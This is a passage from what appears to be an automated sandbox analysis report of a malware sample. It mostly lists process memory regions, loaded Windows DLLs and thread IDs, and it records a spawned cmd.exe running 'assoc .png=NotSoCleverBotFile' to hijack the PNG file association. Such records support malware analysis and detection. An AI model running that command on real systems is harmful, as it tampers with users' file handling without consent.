"c:\\windows\\system32\\kernelbase.dll") Region: id = 1526 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1527 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1528 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1529 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1530 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1531 start_va = 0x7ffd4def0000 end_va = 0x7ffd4def7fff monitored = 0 entry_point = 0x7ffd4def1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1532 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1533 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1534 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1535 start_va = 0x7ffd4e270000 end_va = 0x7ffd4e2dafff monitored = 0 entry_point = 0x7ffd4e2890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1536 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1537 start_va = 0x7ffd4e530000 end_va = 0x7ffd4e958fff monitored = 0 entry_point = 0x7ffd4e558740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1538 start_va = 0x7ffd4e970000 end_va = 0x7ffd4e9cbfff monitored = 0 entry_point = 0x7ffd4e98b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1539 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1540 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1541 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1542 start_va = 0x7ffd50150000 end_va = 0x7ffd501f6fff monitored = 0 entry_point = 0x7ffd5015b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1543 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1544 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1546 start_va = 0x8810000 end_va = 0x890ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 1547 start_va = 0x8910000 end_va = 0x8a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008910000" filename = "" Region: id = 1548 start_va = 0x8a10000 end_va = 0x8b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a10000" filename = "" Region: id = 1550 start_va = 0x420000 end_va = 0x427fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1551 start_va = 0x420000 end_va = 0x425fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1856 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2816 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x42b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 2817 start_va = 0x2f10000 end_va = 0x2f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 2818 start_va = 0x2f90000 end_va = 0x308ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 2819 start_va = 0x3290000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2820 start_va = 0x7ffd44ff0000 end_va = 0x7ffd45025fff monitored = 0 entry_point = 0x7ffd45009b90 region_type = mapped_file name = "netsetupsvc.dll" filename = "\\Windows\\System32\\NetSetupSvc.dll" (normalized: "c:\\windows\\system32\\netsetupsvc.dll") Region: id = 2821 start_va = 0x4bd0000 end_va = 0x4ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 2822 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 2823 start_va = 0x7ffd40ab0000 end_va = 0x7ffd40b5ffff monitored = 0 entry_point = 0x7ffd40ad4450 region_type = mapped_file name = "netsetupengine.dll" filename = "\\Windows\\System32\\NetSetupEngine.dll" (normalized: "c:\\windows\\system32\\netsetupengine.dll") Region: id = 2824 start_va = 0x7ffd45f80000 end_va = 0x7ffd45f99fff monitored = 0 entry_point = 0x7ffd45f81620 region_type = mapped_file name = "implatsetup.dll" filename = "\\Windows\\System32\\ImplatSetup.dll" (normalized: "c:\\windows\\system32\\implatsetup.dll") Region: id = 2825 start_va = 0x7ffd45f80000 end_va = 0x7ffd45f99fff monitored = 0 entry_point = 0x7ffd45f81620 region_type = mapped_file name = "implatsetup.dll" filename = "\\Windows\\System32\\ImplatSetup.dll" (normalized: "c:\\windows\\system32\\implatsetup.dll") Region: id = 2826 start_va = 0x7ffd40ab0000 end_va = 0x7ffd40b5ffff monitored = 0 entry_point = 0x7ffd40ad4450 region_type = mapped_file name = "netsetupengine.dll" filename = "\\Windows\\System32\\NetSetupEngine.dll" (normalized: "c:\\windows\\system32\\netsetupengine.dll") Region: id = 2827 start_va = 0x7ffd45f80000 end_va = 0x7ffd45f99fff monitored = 0 entry_point = 0x7ffd45f81620 region_type = mapped_file name = "implatsetup.dll" filename = "\\Windows\\System32\\ImplatSetup.dll" (normalized: "c:\\windows\\system32\\implatsetup.dll") Region: id = 2828 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 2829 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 2830 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 2831 start_va = 0x7ffd3af90000 end_va = 0x7ffd3afa0fff monitored = 0 entry_point = 0x7ffd3af93e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 2832 start_va = 0x7ffd40b20000 end_va = 0x7ffd40b58fff monitored = 0 entry_point = 0x7ffd40b29c90 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 2844 start_va = 0x7ffd40ab0000 end_va = 0x7ffd40b5ffff monitored = 0 entry_point = 0x7ffd40ad4450 region_type = mapped_file name = "netsetupengine.dll" filename = "\\Windows\\System32\\NetSetupEngine.dll" (normalized: "c:\\windows\\system32\\netsetupengine.dll") Region: id = 2845 start_va = 0x7ffd45f80000 end_va = 0x7ffd45f99fff monitored = 0 entry_point = 0x7ffd45f81620 region_type = mapped_file name = "implatsetup.dll" filename = "\\Windows\\System32\\ImplatSetup.dll" (normalized: "c:\\windows\\system32\\implatsetup.dll") Region: id = 2846 start_va = 0x420000 end_va = 0x42afff monitored = 0 entry_point = 0x436c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2847 start_va = 0x7ffd40b10000 end_va = 0x7ffd40b55fff monitored = 0 entry_point = 0x7ffd40b179a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2848 start_va = 0x420000 end_va = 0x43bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.tlb" filename = "\\Windows\\System32\\activeds.tlb" (normalized: "c:\\windows\\system32\\activeds.tlb") Region: id = 2849 start_va = 0x420000 end_va = 0x42afff monitored = 0 entry_point = 0x436c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2850 start_va = 0x420000 end_va = 0x42afff monitored = 0 entry_point = 0x436c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2851 start_va = 0x420000 end_va = 0x42afff monitored = 0 entry_point = 0x436c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2933 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2989 start_va = 0x3290000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 3044 start_va = 0x420000 end_va = 0x430fff monitored = 0 entry_point = 0x42b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 3045 start_va = 0x4ad0000 end_va = 0x4b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ad0000" filename = "" Region: id = 3187 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3329 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3330 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Thread: id = 51 os_tid = 0x2dc Thread: id = 52 os_tid = 0xc64 Thread: id = 53 os_tid = 0xd5c Thread: id = 54 os_tid = 0x628 Thread: id = 55 os_tid = 0x388 Thread: id = 56 os_tid = 0x370 Thread: id = 57 os_tid = 0x2c0 Thread: id = 58 os_tid = 0x584 Thread: id = 59 os_tid = 0xde8 Thread: id = 60 os_tid = 0xdcc Thread: id = 61 os_tid = 0x900 Thread: id = 62 os_tid = 0x424 Thread: id = 63 os_tid = 0x7a0 Thread: id = 64 os_tid = 0xda0 Thread: id = 65 os_tid = 0xc50 Thread: id = 66 os_tid = 0xc38 Thread: id = 67 os_tid = 0x678 Thread: id = 68 os_tid = 0x5c4 Thread: id = 69 os_tid = 0xbac Thread: id = 70 os_tid = 0x54c Thread: id = 71 os_tid = 0x310 Thread: id = 72 os_tid = 0x2fc Thread: id = 73 os_tid = 0xcec Thread: id = 74 os_tid = 0xcd8 Thread: id = 75 os_tid = 0xcb4 Thread: id = 76 os_tid = 0xc84 Thread: id = 77 os_tid = 0xc90 Thread: id = 78 os_tid = 0xc9c Thread: id = 79 os_tid = 0xc60 Thread: id = 80 os_tid = 0x5b0 Thread: id = 81 os_tid = 0x9a0 Thread: id = 82 os_tid = 0xb80 Thread: id = 83 os_tid = 0xeb8 Thread: id = 84 os_tid = 0xc2c Thread: id = 85 os_tid = 0xb5c Thread: id = 86 os_tid = 0xab8 Thread: id = 87 os_tid = 0x8ec Thread: id = 88 os_tid = 0xff0 Thread: id = 89 os_tid = 0xfac Thread: id = 90 os_tid = 0xf84 Thread: id = 91 os_tid = 0xf64 Thread: id = 92 os_tid = 0xe34 Thread: id = 93 os_tid = 0xe24 Thread: id = 94 os_tid = 0xe1c Thread: id = 95 os_tid = 0xe10 Thread: id = 96 os_tid = 0xc28 Thread: id = 97 os_tid = 0xa84 Thread: id = 98 os_tid = 0xa80 Thread: id = 99 os_tid = 0xa7c Thread: id = 100 os_tid = 0x9c8 Thread: id = 101 os_tid = 0x9b8 Thread: id = 102 os_tid = 0x94c Thread: id = 103 os_tid = 0x8e4 Thread: id = 104 os_tid = 0x8e0 Thread: id = 105 os_tid = 0x8d8 Thread: id = 106 os_tid = 0x8c0 Thread: id = 107 os_tid = 0x8a8 Thread: id = 108 os_tid = 0x8a0 Thread: id = 109 os_tid = 0x898 Thread: id = 110 os_tid = 0x878 Thread: id = 111 os_tid = 0x868 Thread: id = 112 os_tid = 0x830 Thread: id = 113 os_tid = 0x560 Thread: id = 114 os_tid = 0x598 Thread: id = 115 os_tid = 0x190 Thread: id = 116 os_tid = 0x7cc Thread: id = 117 os_tid = 0x7ac Thread: id = 118 os_tid = 0x6e0 Thread: id = 119 os_tid = 0x448 Thread: id = 120 os_tid = 0x5b4 Thread: id = 121 os_tid = 0x50c Thread: id = 122 os_tid = 0x4d4 Thread: id = 123 os_tid = 0x484 Thread: id = 124 os_tid = 0x464 Thread: id = 125 os_tid = 0x414 Thread: id = 126 os_tid = 0x2f4 Thread: id = 127 os_tid = 0x284 Thread: id = 128 os_tid = 0x264 Thread: id = 129 os_tid = 0x210 Thread: id = 130 os_tid = 0x144 Thread: id = 131 os_tid = 0x140 Thread: id = 132 os_tid = 0x120 Thread: id = 133 os_tid = 0x11c Thread: id = 134 os_tid = 0x60 Thread: id = 135 os_tid = 0x3fc Thread: id = 136 os_tid = 0x3f4 Thread: id = 137 os_tid = 0x360 Thread: id = 138 os_tid = 0xaac Thread: id = 139 os_tid = 0xaf4 Thread: id = 140 os_tid = 0x4ec Thread: id = 194 os_tid = 0xdd4 Thread: id = 195 os_tid = 0x320 Thread: id = 196 os_tid = 0x103c Thread: id = 197 os_tid = 0x1150 Thread: id = 198 os_tid = 0x1114 Thread: id = 199 os_tid = 0x1174 Thread: id = 200 os_tid = 0x11b8 Thread: id = 201 os_tid = 0x1394 Thread: id = 210 os_tid = 0x1008 Thread: id = 214 os_tid = 0x12fc Thread: id = 215 os_tid = 0x1304 Thread: id = 229 os_tid = 0x904 Process: id = "15" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x63af5000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C assoc .png=NotSoCleverBotFile" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1552 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1553 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1554 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1555 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1556 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1557 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1558 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1559 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1560 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1561 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1562 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 1563 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1564 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1565 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1566 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1567 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 1568 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1569 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1570 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1571 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1572 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1573 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1574 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1575 start_va = 0x560000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1576 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1577 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1578 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1579 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1580 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1662 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1663 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1664 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1665 start_va = 0x20000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1666 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1667 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1668 start_va = 0x1d0000 end_va = 0x1d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1669 start_va = 0x6ab60000 end_va = 0x6ab67fff monitored = 0 entry_point = 0x6ab61840 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 1670 start_va = 0x75690000 end_va = 0x76a8efff monitored = 0 entry_point = 0x7584b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1671 start_va = 0x76a90000 end_va = 0x76ac6fff monitored = 0 entry_point = 0x76a93b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1672 start_va = 0x76e20000 end_va = 0x77318fff monitored = 0 entry_point = 0x77027610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1673 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1674 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1675 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1676 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1677 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1678 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1679 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1680 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1681 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1682 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1683 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1684 start_va = 0x775e0000 end_va = 0x7766cfff monitored = 0 entry_point = 0x77629b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1685 start_va = 0x74e20000 end_va = 0x74e63fff monitored = 0 entry_point = 0x74e27410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1686 start_va = 0x77670000 end_va = 0x7767efff monitored = 0 entry_point = 0x77672e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1687 start_va = 0x500000 end_va = 0x529fff monitored = 0 entry_point = 0x505680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1688 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1689 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1690 